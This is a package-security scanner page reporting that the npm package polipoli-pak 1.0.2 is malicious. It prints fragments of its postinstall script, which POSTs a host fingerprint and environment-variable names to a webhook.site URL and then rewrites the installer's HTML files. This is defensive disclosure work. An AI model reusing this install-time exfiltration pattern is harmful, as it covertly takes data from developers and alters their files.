registry  /  polipoli-pak  /  1.0.2

polipoli-pak@1.0.2

Small UI banner helper for React apps.

OSV Malicious Advisory

scanned 3h ago · by OpenSSF/OSV

OpenSSF/OSV advisory MAL-2026-10099 confirms this npm version as malicious. On npm install, postinstall.js runs automatically and performs two unauthorized actions against the installer. First, it POSTs a JSON fingerprint of the installing machine — os.hostname(), os.userInfo().username, platform, arch, node version, cwd, INIT_CWD, npm user-agent, and the sorted list of every process.env variable name — to a hardcoded webhook.site canary URL...

Advisory
MAL-2026-10099
Source
OpenSSF Malicious Packages via OSV
Summary
Malicious code in polipoli-pak (npm)
Details
On npm install, postinstall.js runs automatically and performs two unauthorized actions against the installer. First, it POSTs a JSON fingerprint of the installing machine — os.hostname(), os.userInfo().username, platform, arch, node version, cwd, INIT_CWD, npm user-agent, and the sorted list of every process.env variable name — to a hardcoded webhook.site canary URL (https://webhook.site/a428f027-90c9-45e2-acca-ffbb4ea86044) that the installer never configured. Second, it walks common project locations under INIT_CWD (index.html, public/index.html, src/index.html, dist/index.html, build/index.html) and rewrites each file via fs.writeFileSync to inject a fixed-position red banner div into the page body. The environment-variable name inventory reveals which credentials are present on the host, and the HTML rewrite silently modifies files the installer owns at install time.
Decision reason
One or more suspicious static signals were detected.

Decision evidence

public snapshot
Behavioral surface
Source
EnvironmentVarsNetwork
Supply chain
UrlStrings
ManifestNo manifest risk signals triggered.
scanned 2 file(s), 3.17 KB of source, external domains: webhook.site

Source & flagged code

4 flagged · loading source
package.jsonView file
scripts.postinstall = node postinstall.js
High
Install Time Lifecycle Scripts

Package defines install-time lifecycle scripts.

package.jsonView on unpkg
scripts.postinstall = node postinstall.js
Medium
Ambiguous Install Lifecycle Script

Install-time lifecycle script is not statically allowlisted and needs review.

package.jsonView on unpkg
postinstall.jsView file
19var NONCE = 'POLIPOLI-9f3c7a'; L20: var CANARY = 'https://webhook.site/a428f027-90c9-45e2-acca-ffbb4ea86044'; L21: ... L27: var lib = u.protocol === 'https:' ? https : http; L28: var body = Buffer.from(JSON.stringify(obj)); L29: var req = lib.request(u, { method: 'POST', timeout: 4000, ... L32: req.on('error', function () {}); req.on('timeout', function () { req.destroy(); }); L33: req.write(body); req.end(); L34: } catch (e) {} ... L38: nonce: NONCE, ts: Date.now(), L39: host: os.hostname(), platform: process.platform, arch: process.arch, node: process.version, L40: cwd: process.cwd(), initCwd: process.env.INIT_CWD || null,
High
Host Fingerprint Exfiltration

Source collects local host identity data and sends it to an external endpoint.

postinstall.jsView on unpkg · L19
19var NONCE = 'POLIPOLI-9f3c7a'; L20: var CANARY = 'https://webhook.site/a428f027-90c9-45e2-acca-ffbb4ea86044'; L21: ... L27: var lib = u.protocol === 'https:' ? https : http; L28: var body = Buffer.from(JSON.stringify(obj)); L29: var req = lib.request(u, { method: 'POST', timeout: 4000, ... L32: req.on('error', function () {}); req.on('timeout', function () { req.destroy(); }); L33: req.write(body); req.end(); L34: } catch (e) {} ... L38: nonce: NONCE, ts: Date.now(), L39: host: os.hostname(), platform: process.platform, arch: process.arch, node: process.version, L40: cwd: process.cwd(), initCwd: process.env.INIT_CWD || null,
High
Sandbox Evasion Gated Capability

Source gates dangerous network, credential, or execution behavior behind CI, host, platform, time, or geo fingerprint checks.

postinstall.jsView on unpkg · L19

Findings

3 High3 Medium2 Low
HighInstall Time Lifecycle Scriptspackage.json
HighHost Fingerprint Exfiltrationpostinstall.js
HighSandbox Evasion Gated Capabilitypostinstall.js
MediumAmbiguous Install Lifecycle Scriptpackage.json
MediumNetwork
MediumEnvironment Vars
LowScripts Present
LowUrl Strings